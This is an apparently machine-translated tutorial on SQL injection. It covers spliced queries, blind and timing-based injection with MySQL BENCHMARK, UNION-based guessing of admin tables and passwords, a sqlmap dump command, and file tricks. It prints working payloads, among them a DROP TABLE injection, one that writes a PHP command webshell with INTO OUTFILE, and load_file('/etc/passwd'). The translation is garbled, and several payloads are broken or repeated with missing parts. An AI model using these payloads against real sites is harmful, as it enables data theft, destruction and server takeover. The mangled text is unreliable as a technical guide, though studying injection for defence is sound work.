The essence of an injection attack is to execute the data entered by the user as code. Here are two key conditions, the first is the user can control the input, the second is the original program to execute the code, splicing the user input data.
1. SQL injected
A typical example of a SQL injection:
var ShipCity; Shipcity = Request.Form ("Shipcity") var sql = "Selelct * from orderstable where ShipCity = '" + ShipCity + "'" |
The value of the variable shipcity is submitted by the user, if the user submits a semantic SQL statement, such as:
Beijing;drop table orderstable-- |
Then the SQL statement is actually executed as follows:
SELECT * from orderstable where ShipCity = ' Beijing '; drop table orderstable-- |
The normal execution of the query statement, after becoming a query, then perform a drop table operation.
1.1. Blind note
A blind is an injection attack done when the server does not have an error echo.
The most common method of blind validation is to construct a simple conditional statement that determines whether the SQL statement is executed, depending on whether the returned page has changed.
For example, the URL for an app is as follows:
http://newspaper.com/items.php?id=2
|
The SQL statement executed is:
Select Title,description,body from items where id = 2
|
If the attacker constructs the following conditional statement:
http://newspaper.com/items.php?id=2 and 1=2
|
The actual SQL statement executed is:
Select Title,description,body from items where id = 2 and 1 = 2
|
Because 1=2 is always a false proposition, the and condition of this SQL statement cannot be set up by the user. For Web applications, the result will not be returned to the user, the page result that the attacker sees is either empty or an error page
To further confirm the presence of the injection, the attacker can continue to construct the following request:
http://newspaper.com/items.php?id=2 and 1=1
|
If the page page returns properly, then the and successful execution of the SQL statement will determine if the ID parameter has a SQL vulnerability.
1.2, Timing Attack
In MySQL there is a benchmark () function, which is used to test function performance, and it has two parameters:
The result of the function execution is to execute the expression expr count times, for example:
MySQL > SELECT BENCHMARK (1000000,encode (' Hello ', ' goodbye ')); |
This will encode (' Hello ', ' goodbye ') executed 1 million times.
Therefore, using the benchmark function, the same function can be executed several times, so that the results returned longer than usual, through the change of time, you can determine whether the injection statement execution success. This technique is called timing Attack in the blinds.
The next thing an attacker would do is to use timing attack to complete this attack, such as constructing an attack parameter ID value of:
1170 Union Select if (substring (current,1,1) = char (119), Benchmark (5000000,encode (' msg ', ' by 5 seconds '), null) from ( Select Database () as current) as TBL;
|
Code annotations:
Union: Used to merge the result set of two or more SELECT statements and eliminate any duplicate rows in the table, the internal SELECT statement must have the same number of columns, and the column must have a similar data type . the column name in the UNION result set is always equal to the column name in the first SELECT statement. Also, the order of the columns in each SELECT statement must be the same. UNION ALL: Do not eliminate duplicate rows Select if (EXPR1,EXPR2,EXPR3): Returns EXPR2 if EXPR1 is true, otherwise returns EXPR3. Select Database (): View the current database and return NULL if the current user is logged on without switching to any database. Other functions: System_user (): System user of the database Current_User (): Currently logged in to the library user LAST_INSERT_ID (): The ID of the last inserted database |
This section of the payload determines whether the first letter of the library name is char (119), or lowercase w. If the result is true, a longer delay is caused by the benchmark () function, and if it is not true, the statement is executed very quickly. The attacker iterates through all the letters until the entire database name is fully validated.
If the current database user (Current_User) has write permissions, the attacker can write information to the local disk. Such as:
1170 UNION ALL select Table_name,table_type,engin from information_schema.tables where table_schema = ' mysql ' ORDER by tab Le_name desc into outfile '/path/shema.txt ' |
In addition, you can write a Webshell by using the dump file method:
1170 Union select "<? System ($_request[' cmd ');?> ", 2,3,4 into OutFile"/path/c.php "-- |
Timing attack is a high-level technique for blind bets. In different databases, there are functions similar to benchmark () that can be exploited by timing attack.
Mysql:benchmark (1000000,MD5 (1)) or sleep (5)
Postgresql:pg_sleep (5) or generate_series (1,1000000)
MS SQL sever:waitfor DELAY ' 0:0:5 '
2. Database Attack skills
SQL injection is a database-based attack. Different databases have different functions, different grammars, and functions, so the techniques for SQL injection vary for different databases.
2.1. Common attack techniques
The following payload is the use of the Union Select to confirm the existence of the table name Admin, and whether the column name passwd exists:
Id=5 UNION ALL select the From admin Id=5 UNION ALL select 1,2,PASSWD from Adin |
Further, you want to guess the specific values of username and password:
Id=5 and ASCII (substring (select Concat (username,03xa,passwd) from users limit 0,1) >/*ret true*/ Id=5 and ASCII (substring (select Concat (username,03xa,passwd) from users limit 0,1) >/*ret true*/ Id=5 and ASCII (substring (select Concat (username,03xa,passwd) from users limit 0,1) >/*ret true*/ ... |
Code annotations:
concat: used to concatenate multiple strings into a single string SUBSTRING: Character interception Limit: used to force the SELECT statement to return the specified number of records, the first parameter specifies the offset of the first return record row, and the second parameter specifies the maximum number of rows to be returned for a record |
This process is tedious and sqlmap.py (http://sqlmap.sourceforge.net) is a very good automated injection tool:
$ python sqlmap.py-u "http://a.com/test.php?id=1"---dump-t users |
In the process of injection, there are often some techniques for writing files. For example, in MySQL, you can read system files through Load_file () and write local files through into DumpFile. Therefore, restricting the current database user to read and write the response file or directory permissions is also one of the means of security defense.
Union Select Load_file ('/etc/passwd '), 1, 1; CREATE table potatoes (line blob); Union Select 1,1,hex (load_file ('/etc/passwd ')), with the DumpFile '/path/patatoes ' in the "; Load Data infile '/path/patatoes ' into table potaboes; |
In addition to using into DumpFile, you can also use into outfile, where the difference is dumpfile applies to binary files, while outfile is more appropriate for text files.
2.2. Command
Web Security Injection attack